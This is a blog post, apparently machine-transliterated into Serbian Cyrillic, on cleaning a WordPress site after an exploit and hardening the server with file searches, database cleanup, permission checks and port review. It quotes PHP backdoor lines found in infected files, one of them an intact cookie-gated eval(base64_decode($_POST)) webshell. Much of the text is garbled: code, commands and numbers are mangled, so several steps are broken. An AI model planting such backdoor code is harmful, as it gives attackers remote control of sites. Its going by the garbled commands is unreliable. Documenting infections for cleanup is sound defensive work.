УордПресс Екплоит - чишћење инфицираног фајлова, и сигурност СКЛ Сервер.

Пре него што прочитате овај чланак, требало би да видите , Да разумемо нешто. :)

Нашли смо многе од блогова на стеалтхсеттингс.цом фајлова, код као у наставку, који произилазе из вирусарии са ВордПресс експлоатишу.:

<? Пхп иф ($ _ ГЕТ [ 'КСНУМКСабцбКСНУМКС'] == "КСНУМКСеКСНУМКСдКСНУМКСбКСНУМКСбКСНУМКСеКСНУМКСдКСНУМКС") {ЕВАЛ (басеКСНУМКС_децоде ($ _ПОСТ [ 'фајл'])); излаз; }?>

si

<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST[‘file’])); exit; } ?>

кмлрпцАко је изнад о фајлу кмлрпц.пхп од поспан, На греп сервера, изгледа као доста ове врсте у изворним кодовима.

пппффиууу

Чишћења заражених датотека:

Оооокккк ...
КСНУМКС. Најбоље решење, као што се то ради резерваИ очишћена база података за стергети датотеке WordPress (Вп-цонфиг.пхп може задржати датотеке нису стриктно везане за ВП платформу, након пажљиво проверити) на серверу и да поставите оригиналну верзију КСНУМКС (Овом приликом и направити упграде верзија :) вп) http://wordpress.org/download/ . Обришите укључујући и фајлови тема ако не верујете да су њихови пажљивом проверавању.

Чини се да су погођени и фајлове од тема које нису коришћене и раније на блогу и једноставно мењање тема, не решава проблем.

./андрееа/вп-цонтент/тхемес/дефаулт/индек.пхп:<?пхп ако ($ _ ЦООКИЕ ['КСНУМКСеКСНУМКСфКСНУМКСфбецаКСНУМКС'] == 'КСНУМКСцдКСНУМКСцКСНУМКСбКСНУМКСбКСНУМКСцКСНУМКСеа ") {евал (басеКСНУМКС_децоде ($ _ПОСТ [' фајл '])); екит; ??}> <ПХП гет_хеадер (); ?>

КСНУМКС. Тражи и избришете све фајлове са:... * _нев.пхп, _олд.пхп *, * Јпгг, гифф *, * Пнгг и ВП-Инфо.ткт фајл, ако их има.

Нађи. -Наме "* _нев.пхп"
Нађи. -Наме "* _олд.пхп"
Нађи. -Наме "* Јпгг."
Нађи. -Наме "* _гифф"
Нађи. -Наме "* _пнгг"
Нађи. -Назив "вп-инфо.ткт"

КСНУМКС. у / Тмп , Сеарцх и обрисати као тмпИвбзТКСНУМКС

СКЛ чишћење :

КСНУМКС. Табела у табели вп_оптионс Проверите и обришите линије: интернал_линкс_цацхе, rss_f541b3abd05e7962fcab37737f40fad8 si вордпресс_оптионс.

КСНУМКС. Све у вп_оптионс, идите на ацтиве_плугинс и брисање ако постоји плугин који завршава у једном од локала _нев.пхп *, * _олд.пхп, јпгг *, *.. гифф, *. пнгг или ако се сумња на другом локалу, проверите пажљиво.

КСНУМКС. У табели вп_усерс, Види да ли постоји корисник који није написао ништа у његовом праву, колона усер_ниценаме. Брисање корисника, али обратите пажњу на број личне колони. Овај корисник може да користи "ВордПресс" као усер_логин се ствара и појави се на КСНУМКС: КСНУМКС: КСНУМКС КСНУМКС-КСНУМКС-КСНУМКС.

КСНУМКС. Мергети у табелул вп_усермета и избрисати све линије које припадају ИД горе.

Након што сте урадили овај скл чишћење, онемогућите, а затим омогућите одређени додатак. (На блогу -> Контролна табла -> Додаци)

Сецуре сервер:

КСНУМКС. Погледајте шта директоријуме и датотеке "писати"(Промена дозвола КСНУМКС) и покушати да стави на њих у цхмод да неће дозволити њихово писање на било ком нивоу. (Цхмод КСНУМКС, на пример)

Нађи. -Перм-КСНУМКС-Лс

КСНУМКС. Погледајте шта датотеке имају битну сет Суид или сгид . Ако не користите ове фајлове ставио на њих цхмод КСНУМКС или деинсталирате пакет да садржи. Они су веома опасни, јер они извршавају привилегије "група"Или"корен"Не са нормалним корисничких привилегија да изврши тај фајл.

финд /-типе ф-Перм-КСНУМКС-Лс
финд /-типе ф-Перм-КСНУМКС-Лс

КСНУМКС. Проверите који портови су отворени и покушајте да затворите или обезбеди онима који се не користе.

нетстат-| греп-и слушати

Толико. Видим Гоогле претрага и други кажу: "Па јесу!". Па добро си то урадио ... али ви знате да Гоогле почне да се забрани сви сајтови формирање Је спам и пут тројанце (Тројан.Цлицкер.ХТМЛ) У колача?

УордПресс Екплоит - чишћење инфицираног фајлова, и сигурност СКЛ Сервер.

О аутору

Потајно

Страствени о свему што значи гадгет и ИТ, са задовољством пишем на стеалтхсеттингс.цом са КСНУМКС-а и волим да откривам нове ствари о рачунарима и мацОС-у, Линук оперативним системима, Windows, иОС и Андроид.

Додај коментар

Оставите коментар